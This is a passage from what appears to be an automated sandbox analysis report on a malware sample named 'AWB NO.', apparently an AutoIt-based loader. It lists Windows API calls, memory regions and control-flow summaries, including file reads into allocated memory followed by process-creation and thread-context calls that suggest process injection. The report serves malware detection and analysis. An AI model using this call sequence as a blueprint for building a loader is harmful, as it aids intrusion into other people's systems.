                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileFind$AttributesCloseFirst
                                                              • String ID:
                                                              • API String ID: 48322524-0
                                                              • Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                              • Instruction ID: d948841d4539c93f635718a430456d5b2beea82774a4ad5489b04229db4e1113
                                                              • Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
                                                              • Instruction Fuzzy Hash: 81E0D8318104005B46106738EC4D4EF7B5C9E86335F100B6BFC35C15E0F7B85964869F
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410BBB
                                                              • timeGetTime.WINMM ref: 00410E76
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410FB3
                                                              • TranslateMessage.USER32(?), ref: 00410FC7
                                                              • DispatchMessageW.USER32(?), ref: 00410FD5
                                                              • Sleep.KERNEL32(0000000A), ref: 00410FDF
                                                              • LockWindowUpdate.USER32(00000000,?,?), ref: 0041105A
                                                              • DestroyWindow.USER32 ref: 00411066
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00411080
                                                              • Sleep.KERNEL32(0000000A,?,?), ref: 004452AD
                                                              • TranslateMessage.USER32(?), ref: 0044608A
                                                              • DispatchMessageW.USER32(?), ref: 00446098
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004460AC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prL$prL$prL$prL
                                                              • API String ID: 4003667617-1216555602

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                              • RegisterClassExW.USER32(00000030), ref: 0040309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                              • LoadIconW.USER32(000000A9), ref: 004030F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                              Strings
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915


                                                              Control-flow Graph

                                                              [Control-flow graph; first block 403633-403681; labelled API calls: DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, KillTimer, CreatePopupMenu, MoveWindow, SetFocus; legend: Executed / Not Executed]
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                              • KillTimer.USER32(?,00000001), ref: 004036FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                              • CreatePopupMenu.USER32 ref: 0040373E
                                                              • PostQuitMessage.USER32(00000000), ref: 0040375F
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated$%I
                                                              • API String ID: 129472671-1195164674

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403A62
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403A71
                                                              • LoadIconW.USER32(00000063), ref: 00403A88
                                                              • LoadIconW.USER32(000000A4), ref: 00403A9A
                                                              • LoadIconW.USER32(000000A2), ref: 00403AAC
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AD2
                                                              • RegisterClassExW.USER32(?), ref: 00403B28
                                                                • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                              Strings
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026

                                                              Control-flow Graph

                                                              [Control-flow graph; first block 4071eb-407310; labelled API calls: RegOpenKeyExW, RegQueryValueExW, RegCloseKey; legend: Executed / Not Executed]
                                                              APIs
                                                                • Part of subcall function 00404864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C62F8,?,004037C0,?), ref: 00404882
                                                                • Part of subcall function 0042074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004072C5), ref: 00420771
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00407308
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043ECF1
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043ED32
                                                              • RegCloseKey.ADVAPI32(?), ref: 0043ED70
                                                              Strings
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 338900592-2727554177
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00438355
                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 0043836F
                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00438392
                                                              • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 004383A4
                                                              • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 0043876A
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00438796
                                                                • Part of subcall function 00430D2D: FindCloseChangeNotification.KERNELBASE(00000000,0048FB24,00000000,?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D7D
                                                                • Part of subcall function 00430D2D: GetLastError.KERNEL32(?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D87
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorLast$Close$Handle$ChangeFileFindNotificationType
                                                              • String ID: \O@
                                                              • API String ID: 688622981-2614762652

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004203D3
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 004203DB
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004203E6
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004203F1
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 004203F9
                                                                • Part of subcall function 004203A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00420401
                                                                • Part of subcall function 00416259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040FA90), ref: 004162B4
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040FB2D
                                                              • OleInitialize.OLE32(00000000), ref: 0040FBAA
                                                              • CloseHandle.KERNEL32(00000000), ref: 004449F2
                                                              Strings
                                                              Similarity
                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID: <gL$\dL$%I$cL
                                                              • API String ID: 1986988660-4247061687

                                                              Control-flow Graph

                                                              control_flow_graph 1365 10325f0-103269e call 1030000 1368 10326a5-10326cb call 1033500 CreateFileW 1365->1368 1371 10326d2-10326e2 1368->1371 1372 10326cd 1368->1372 1380 10326e4 1371->1380 1381 10326e9-1032703 VirtualAlloc 1371->1381 1373 103281d-1032821 1372->1373 1374 1032863-1032866 1373->1374 1375 1032823-1032827 1373->1375 1377 1032869-1032870 1374->1377 1378 1032833-1032837 1375->1378 1379 1032829-103282c 1375->1379 1382 1032872-103287d 1377->1382 1383 10328c5-10328da 1377->1383 1384 1032847-103284b 1378->1384 1385 1032839-1032843 1378->1385 1379->1378 1380->1373 1386 1032705 1381->1386 1387 103270a-1032721 ReadFile 1381->1387 1390 1032881-103288d 1382->1390 1391 103287f 1382->1391 1392 10328ea-10328f2 1383->1392 1393 10328dc-10328e7 VirtualFree 1383->1393 1394 103285b 1384->1394 1395 103284d-1032857 1384->1395 1385->1384 1386->1373 1388 1032723 1387->1388 1389 1032728-1032768 VirtualAlloc 1387->1389 1388->1373 1396 103276a 1389->1396 1397 103276f-103278a call 1033750 1389->1397 1398 10328a1-10328ad 1390->1398 1399 103288f-103289f 1390->1399 1391->1383 1393->1392 1394->1374 1395->1394 1396->1373 1405 1032795-103279f 1397->1405 1402 10328ba-10328c0 1398->1402 1403 10328af-10328b8 1398->1403 1401 10328c3 1399->1401 1401->1377 1402->1401 1403->1401 1406 10327d2-10327e6 call 1033560 1405->1406 1407 10327a1-10327d0 call 1033750 1405->1407 1413 10327ea-10327ee 1406->1413 1414 10327e8 1406->1414 1407->1405 1415 10327f0-10327f4 FindCloseChangeNotification 1413->1415 1416 10327fa-10327fe 1413->1416 1414->1373 1415->1416 1417 1032800-103280b VirtualFree 1416->1417 1418 103280e-1032817 1416->1418 1417->1418 1418->1368 1418->1373
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010326C1
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010328E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0

                                                              Control-flow Graph

                                                              control_flow_graph 1486 4039e7-403a57 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A15
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A36
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A4A
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399

                                                              Control-flow Graph

                                                              control_flow_graph 1605 10323b0-10324e4 call 1030000 call 10322a0 CreateFileW 1612 10324e6 1605->1612 1613 10324eb-10324fb 1605->1613 1614 103259b-10325a0 1612->1614 1616 1032502-103251c VirtualAlloc 1613->1616 1617 10324fd 1613->1617 1618 1032520-1032537 ReadFile 1616->1618 1619 103251e 1616->1619 1617->1614 1620 103253b-1032575 call 10322e0 call 10312a0 1618->1620 1621 1032539 1618->1621 1619->1614 1626 1032591-1032599 ExitProcess 1620->1626 1627 1032577-103258c call 1032330 1620->1627 1621->1614 1626->1614 1627->1626
                                                              APIs
                                                                • Part of subcall function 010322A0: Sleep.KERNELBASE(000001F4), ref: 010322B1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010324DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: VBM05RCB11LBQNL3
                                                              • API String ID: 2694422964-989228358

                                                              Control-flow Graph

                                                              control_flow_graph 1629 437f4d-437f5a call 42a099 1632 437fb3-437fcb CreateFileW 1629->1632 1633 437f5c-437f77 GetModuleHandleW GetProcAddress 1629->1633 1636 437fd1-437fd4 1632->1636 1634 437f79-437f7c 1633->1634 1635 437f7e-437fb1 1633->1635 1634->1636 1635->1636
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 00437F66
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00437F6D
                                                              • CreateFileW.KERNELBASE(00000000,?,?,?,00000001,?,00000000,00000001,?,?,?,00000000,00000109), ref: 00437FCB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: AddressCreateFileHandleModuleProc
                                                              • String ID: CreateFile2$kernel32.dll
                                                              • API String ID: 2580138172-1988006178
                                                              APIs
                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004696DC
                                                              • DeleteFileW.KERNEL32(?,?), ref: 00469785
                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0046979B
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004697AC
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004697BE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$Copy
                                                              • String ID:
                                                              • API String ID: 3226157194-0
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01031A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01031AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01031B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              APIs
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 004041F1
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D5EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String
                                                              • String ID: Line:
                                                              • API String ID: 3363329723-1585850449
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00469B82
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00469B99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,004697D2,?,?,?,?,?,00000004), ref: 00469B45
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,004697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00469B5B
                                                              • CloseHandle.KERNEL32(00000000,?,004697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469B62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              APIs
                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0043EEAC
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                                • Part of subcall function 004209D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004209F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen
                                                              • String ID: X
                                                              • API String ID: 779396738-3081909835
                                                              APIs
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 004044A6
                                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004044C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_
                                                              • String ID:
                                                              • API String ID: 1144537725-0
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,0048FB24,00000000,?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D7D
                                                              • GetLastError.KERNEL32(?,00438469,0048FB24,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00430D87
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00404992
                                                                • Part of subcall function 004235AC: DecodePointer.KERNEL32(00000001,?,004049A7,004581BC), ref: 004235BE
                                                                • Part of subcall function 004235AC: EncodePointer.KERNEL32(?,?,004049A7,004581BC), ref: 004235C9
                                                                • Part of subcall function 00404A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404A73
                                                                • Part of subcall function 00404A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404A88
                                                                • Part of subcall function 00403B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B7A
                                                                • Part of subcall function 00403B4C: IsDebuggerPresent.KERNEL32 ref: 00403B8C
                                                                • Part of subcall function 00403B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C62F8,004C62E0,?,?), ref: 00403BFD
                                                                • Part of subcall function 00403B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C81
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004049D2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme
                                                              • String ID:
                                                              • API String ID: 1658450864-0
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405981,?,?,?,?), ref: 00405E27
                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405981,?,?,?,?), ref: 0043E19C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00429C64), ref: 00422FA9
                                                              • GetLastError.KERNEL32(00000000,?,00429C64), ref: 00422FBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 485612231-0
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01031A5B
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01031AF1
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01031B13
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18136010399.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1030000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00405CF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
